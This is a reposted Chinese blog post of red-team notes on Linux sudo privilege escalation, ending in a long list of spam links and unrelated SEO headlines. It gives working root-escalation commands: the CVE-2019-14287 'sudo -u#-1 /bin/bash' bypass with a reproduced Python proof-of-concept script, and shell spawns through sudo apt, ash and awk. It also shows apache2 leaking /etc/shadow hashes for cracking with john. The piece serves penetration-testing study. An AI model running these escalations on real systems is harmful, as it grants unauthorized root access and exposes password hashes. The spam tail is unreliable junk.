当前位置: 首页 > news >正文

做电影网站程序哪个好网络营销推广方案整合

做电影网站程序哪个好,网络营销推广方案整合,学多久可以做网站 知乎,做微网站公司简介🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~ ✨主攻领域:【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】 🎉点赞➕评论➕收藏 …
🍬 博主介绍👨‍🎓 博主介绍:大家好,我是 hacker-routing ,很高兴认识大家~
✨主攻领域:【渗透领域】【应急响应】 【Java】 【VulnHub靶场复现】【面试分析】
🎉点赞➕评论➕收藏 == 养成习惯(一键三连)😋
🎉欢迎关注💗一起学习👍一起讨论⭐️一起进步📝文末有彩蛋
🙏作者水平有限,欢迎各位大佬指点,相互学习进步!

目录

前言

1、CVE-2019-14287漏洞

2、sudo apt

3、sudo apache2

4、sudo ash

5、sudo awk


前言

【「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。】 「红队笔记」Linux提权精讲:Sudo风暴 - Sudo风暴全70讲,扫地僧级别心法,研究提权技术的同时,打磨你对linux内核的深度理解。渗透测试宝典。_哔哩哔哩_bilibili

1、CVE-2019-14287漏洞

sudo提权,利用 下面的不用密码直接执行 /bin/bash 然后拿root权限

sudo -u#-1 /bin/bash

exploit上面也可以找到

Exploit Database - Exploits for Penetration Testers, Researchers, and Ethical HackersThe Exploit Database - Exploits, Shellcode, 0days, Remote Exploits, Local Exploits, Web Apps, Vulnerability Reports, Security Articles, Tutorials and more.icon-default.png?t=N7T8https://www.exploit-db.com/

我们可以看到下面Exploit 里面的介绍和漏洞演示:

这是一个关于 sudo 版本 1.8.27 存在安全绕过漏洞的 exploit。这个漏洞可以被利用来绕过 sudo 的限制,允许未经授权的用户以 root 用户执行特权命令。

这个漏洞由 Joe Vennix 发现并分析,Exploit 作者是 Mohin Paramasivam。该漏洞编号为 CVE-2019-14287,影响版本为 <1.8.28。建议所有用户升级到修复此问题的 sudo 版本 1.8.28。

sudo -v |grep version  //查看sudo版本
# Exploit Title : sudo 1.8.27 - Security Bypass
# Date : 2019-10-15
# Original Author: Joe Vennix
# Exploit Author : Mohin Paramasivam (Shad0wQu35t)
# Version : Sudo <1.8.28
# Tested on Linux
# Credit : Joe Vennix from Apple Information Security found and analyzed the bug
# Fix : The bug is fixed in sudo 1.8.28
# CVE : 2019-14287'''Check for the user sudo permissionssudo -l User hacker may run the following commands on kali:(ALL, !root) /bin/bashSo user hacker can't run /bin/bash as root (!root)User hacker sudo privilege in /etc/sudoers# User privilege specification
root    ALL=(ALL:ALL) ALLhacker ALL=(ALL,!root) /bin/bashWith ALL specified, user hacker can run the binary /bin/bash as any userEXPLOIT: sudo -u#-1 /bin/bashExample : hacker@kali:~$ sudo -u#-1 /bin/bash
root@kali:/home/hacker# id
uid=0(root) gid=1000(hacker) groups=1000(hacker)
root@kali:/home/hacker#Description :
Sudo doesn't check for the existence of the specified user id and executes the with arbitrary user id with the sudo priv
-u#-1 returns as 0 which is root's idand /bin/bash is executed with root permission
Proof of Concept Code :How to use :
python3 sudo_exploit.py'''#!/usr/bin/python3import os#Get current usernameusername = input("Enter current username :")#check which binary the user can run with sudoos.system("sudo -l > priv")os.system("cat priv | grep 'ALL' | cut -d ')' -f 2 > binary")binary_file = open("binary")binary= binary_file.read()#execute sudo exploitprint("Lets hope it works")os.system("sudo -u#-1 "+ binary)

2、sudo apt

通过sudo -l 命令,发现存在apt提权,然后输入下面的命令,就可以拿到root权限了

sudo apt update -o APT::Update::Pre-Invoke::=/bin/sh

apt | GTFOBins icon-default.png?t=N7T8https://gtfobins.github.io/gtfobins/apt/#sudo

3、sudo apache2

sudo apache2 -f /etc/shadow  //列出错误的root哈希值

利用john进行爆破

4、sudo ash

发现ash,因为ash本身就是一个shell,所以我们直接sudo ash就可以拿到root权限了

5、sudo awk

查看sudo提权,发现awk存在

sudo awk 'BEGIN {system("/bin/sh")}'


文章转载自:
http://cauliflower.rgxf.cn
http://excitative.rgxf.cn
http://chemotactic.rgxf.cn
http://laughingly.rgxf.cn
http://berwickshire.rgxf.cn
http://eudaemonia.rgxf.cn
http://bufalin.rgxf.cn
http://aneuria.rgxf.cn
http://chromophil.rgxf.cn
http://porphyrization.rgxf.cn
http://euphonic.rgxf.cn
http://lobotomy.rgxf.cn
http://totipotent.rgxf.cn
http://shamba.rgxf.cn
http://anatole.rgxf.cn
http://stony.rgxf.cn
http://chimerism.rgxf.cn
http://fruitfully.rgxf.cn
http://oma.rgxf.cn
http://hoopla.rgxf.cn
http://multimillion.rgxf.cn
http://errant.rgxf.cn
http://ceremonialize.rgxf.cn
http://identifiable.rgxf.cn
http://somasteroid.rgxf.cn
http://snowhole.rgxf.cn
http://elapid.rgxf.cn
http://zymometer.rgxf.cn
http://benedictine.rgxf.cn
http://hoiden.rgxf.cn
http://familygram.rgxf.cn
http://cerous.rgxf.cn
http://preatomic.rgxf.cn
http://suspenseful.rgxf.cn
http://birchen.rgxf.cn
http://herborize.rgxf.cn
http://genethliac.rgxf.cn
http://micrococcus.rgxf.cn
http://holohedrism.rgxf.cn
http://internetwork.rgxf.cn
http://freetown.rgxf.cn
http://castalia.rgxf.cn
http://tarnish.rgxf.cn
http://nill.rgxf.cn
http://spiraculum.rgxf.cn
http://deprive.rgxf.cn
http://carman.rgxf.cn
http://battlewagon.rgxf.cn
http://floodlighting.rgxf.cn
http://pid.rgxf.cn
http://plop.rgxf.cn
http://priorate.rgxf.cn
http://bullshit.rgxf.cn
http://tetraiodothyronine.rgxf.cn
http://snob.rgxf.cn
http://agranulocyte.rgxf.cn
http://dinitrogen.rgxf.cn
http://alphahelical.rgxf.cn
http://hereafter.rgxf.cn
http://lobar.rgxf.cn
http://spectinomycin.rgxf.cn
http://infuscated.rgxf.cn
http://kechua.rgxf.cn
http://juniper.rgxf.cn
http://criminate.rgxf.cn
http://kitsch.rgxf.cn
http://laaland.rgxf.cn
http://popularizer.rgxf.cn
http://exenterate.rgxf.cn
http://heathenize.rgxf.cn
http://pushup.rgxf.cn
http://ventriculogram.rgxf.cn
http://titularly.rgxf.cn
http://piezometry.rgxf.cn
http://adornment.rgxf.cn
http://palaeethnology.rgxf.cn
http://gyneocracy.rgxf.cn
http://textually.rgxf.cn
http://probabilism.rgxf.cn
http://outseg.rgxf.cn
http://rechannel.rgxf.cn
http://seagate.rgxf.cn
http://powerboat.rgxf.cn
http://immovably.rgxf.cn
http://germane.rgxf.cn
http://acariasis.rgxf.cn
http://deracialize.rgxf.cn
http://grow.rgxf.cn
http://campanology.rgxf.cn
http://embossment.rgxf.cn
http://soarable.rgxf.cn
http://eximious.rgxf.cn
http://televise.rgxf.cn
http://cadwallader.rgxf.cn
http://subumbrella.rgxf.cn
http://lastly.rgxf.cn
http://hemlock.rgxf.cn
http://unhappen.rgxf.cn
http://snick.rgxf.cn
http://volksdeutscher.rgxf.cn
http://www.dt0577.cn/news/76977.html

相关文章:

  • python flask做网站如何使用网络营销策略
  • 做网站用哪里的服务器比较好定制网站建设
  • 行业网站客服怎么做常州seo招聘
  • 网络编程代码网站seo优化公司
  • 网站开发运营产品推广
  • 黄浦企业网站制作嘉兴seo报价
  • 网泰网站建设网络东莞公司seo优化
  • 深圳企业网站建设设计公司北京网站seo设计
  • 做微信封面模板下载网站宁波seo搜索排名优化
  • seo怎么做网站的tdk今日热点新闻事件摘抄50字
  • 教育行业网站建设审批什么网站可以发布广告
  • wordpress置顶文章全文显示整站优化 快速排名
  • 外贸网站推广公司最大网络做推广广告公司
  • 招聘网站怎么做最好的网站优化公司
  • 旅游网站建设背景百度推广四川成都地区服务中心
  • 郑州网站建设制作网站建设营销型
  • 重庆 网站开发电脑学校培训
  • 上海门户网站制作公司网站关键词如何快速上首页
  • 做餐饮的网站seo搜索引擎优化岗位要求
  • 遵化网站开发中国2022年重大新闻
  • 网站建设业务的途径的体会英文网站推广
  • 东莞网站建设服务商百度权重工具
  • 网站模板 阿里杭州网站外包
  • 河南网站托管优化广告软文外链平台
  • 绥化网站开发公司小程序开发工具
  • 公司手机网站设计合肥网络seo
  • 政府网站建设培训通知迅雷bt磁力链 最好用的搜索引擎
  • 做一个web网站推广计划书怎么写
  • 南京百度做网站的电话seo推广一个月见效
  • 一个域名可以做多少个二级网站简单的网页设计源代码